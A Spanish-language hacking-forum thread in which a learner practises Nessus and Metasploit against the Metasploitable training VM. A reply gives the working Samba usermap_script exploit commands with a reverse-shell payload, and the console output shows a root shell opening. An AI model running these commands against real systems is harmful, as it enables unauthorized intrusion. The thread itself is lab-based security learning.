elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado:


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking (Moderador: toxeek)
| | |-+  Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???  (Leído 3,322 veces)
CATBro

Desconectado Desconectado

Mensajes: 156


Envidio la manera de pensar de Caboose


Ver Perfil
Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
« en: 28 Junio 2012, 05:04 am »

Que tal ando aprendiendo a usar nessu,metasploits y varias cosas mas en fin, corri el nessus contra la maquina virtual que difunde rapid7 creo( metasploitable ) un resultado de nessus me dice lo siguiente:
CVE 2007-2446
La version de servidor samba de la maquina objetivo es vulnerable a un ataque de desbordamiento de buffer, y en el reporte me dice cual exploit usar con metasploits , entonces
tecleo:

#msfconsole
msf  use exploit/linux/samba/lsa_transnames_heap
msf  exploit(lsa_transnames_heap) > set RHOST X.X:X:.X
msf  exploit(lsa_transnames_heap) > set PAYLOAD linux/x86/exec
msf  exploit(lsa_transnames_heap) > set CMD ifconfig
msf  exploit(lsa_transnames_heap) > show options

Module options (exploit/linux/samba/lsa_transnames_heap):

   Name     Current Setting  Required  Description
   ----            ---------------  --------  -----------
   RHOST     192.168.1.107    yes       The target address
   RPORT      445                     yes       Set the SMB service port
   SMBPIPE   LSARPC              yes       The pipe name to use


Payload options (linux/x86/exec):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------
   CMD   ifconfig         yes       The command string to execute


Exploit target:

   Id  Name
   --  ----
   0   Linux vsyscall

msf  exploit(lsa_transnames_heap) > exploit

  • Creating nop sled....
  • Trying to exploit Samba with address 0xffffe410...
  • Connecting to the SMB service...
  • [-] Exploit exception: This target is not a vulnerable Samba server (Samba 3.0.20-Debian)

    ?????Que hago mal??o es un positivo falso lo que me da nessus, porque hace mucho cuando andaba en mi epoca de aprender lo mas rapido posible corria el armitage desde BT y funcionaba solo!!! Jeje pero ahorita me muevo con debia alguna idea

    Saludos!

En línea

adastra
Endless Learner
Ex-Staff
*
Desconectado Desconectado

Mensajes: 885


http://thehackerway.com/


Ver Perfil WWW
Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
« Respuesta #1 en: 28 Junio 2012, 09:17 am »

 El problema esta en el exploit que estas tratando de usar:


msf > use exploit/multi/samba/usermap_script
msf exploit(usermap_script) > show options
Module options (exploit/multi/samba/usermap_script):Name Current Setting Required Description
—- ————— ——– ———–
RHOST 192.168.1.34 yes The target address
RPORT 445 yes The target port
Exploit target:
Id Name
– —-
0 Automatic
msf exploit(usermap_script) > set PAYLOAD cmd/unix/reverse
PAYLOAD => cmd/unix/reverse
msf exploit(usermap_script) > set LHOST 192.168.1.33
LHOST => 192.168.1.33
msf exploit(usermap_script) > exploit
  • Started reverse double handler
  • Accepted the first client connection…
  • Accepted the second client connection…
  • Command: echo rm6wOwiDrg4PM9Ug;
  • Writing to socket A
  • Writing to socket B
  • Reading from sockets…
  • Reading from socket B
  • B: “rm6wOwiDrg4PM9Ug\r\n”
  • Matching…
  • A is input…
  • Command shell session 4 opened (192.168.1.33:4444 -> 192.168.1.34:53107) at Wed May 18 00:40:18 +0200 2011
uname -r
2.6.24-16-server
whoami
root

Hace algunos meses escribí una serie de publicaciones sobre como explotar las vulnerabilidades que vienen incluidas en Metasploitable. La primera parte comienza aquí:


http://thehackerway.com/2011/06/17/penetrando-sistemas-bajo-plataforma-gnulinux-vulnerable-con-metasploit-framework-parte-i/


Por si te interesa conocer un poco más sobre como atacar una plataforma vulnerable.
Un Saludo.




En línea

CATBro

Desconectado Desconectado

Mensajes: 156


Envidio la manera de pensar de Caboose


Ver Perfil
Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
« Respuesta #2 en: 28 Junio 2012, 23:03 pm »

Llegando a mi casa lo pruebo tambien para leer los tutos que has hecho.
Ya mas comento que paso

Saludos 
En línea

CATBro

Desconectado Desconectado

Mensajes: 156


Envidio la manera de pensar de Caboose


Ver Perfil
Re: Prueba de nessus,metasploits, y vm metasploitable Algo no hago bien???
« Respuesta #3 en: 29 Junio 2012, 03:56 am »

Que tal adastra probe el exploit que me diste funciono muchas gracias pero porque nessus me da uno y no funciona ?? viendo las opciones del exploit que me diste me daba en el puerto de destino el 139 que venia por default, y funciono?? luego lo cale con el 445 y tambien , al googlear sobre ese puerto 445 al parecer hay algun tipo de vulnerabilidad a explotar le investigare bien ya despues comento que encontre.Yo pensaba que samba corria en los puertos 137 a 139 pero no entiendo el 445
Otra cosa ando usando el metasploits pero cuando le doy
> search telnet o cualquie cosa no me da ningun resultado la busqueda porque??
Saludos
« Última modificación: 29 Junio 2012, 05:11 am por CATBro » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Todo bien con mi prueba de SVCD pero....
Multimedia
mike angi 6 2,067 Último mensaje 17 Febrero 2004, 19:26 pm
por mike angi
como hago para que me queden bien?
Diseño Gráfico
Nakp 6 2,021 Último mensaje 10 Julio 2007, 04:39 am
por Nakp
Que hago mal? compilar pero no ejecuta bien
Programación C/C++
roser24 9 2,656 Último mensaje 5 Mayo 2010, 22:43 pm
por Littlehorse
Algo hago mal...o algo evita que lo haga bien... xD (Troyanos)
Análisis y Diseño de Malware
Juan9627a 3 2,749 Último mensaje 11 Enero 2012, 06:32 am
por $Edu$
Ayuda con sistema vulnerable metasploitable 2 y nessus
Hacking
xavicibi 0 2,015 Último mensaje 21 Junio 2014, 17:07 pm
por xavicibi
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines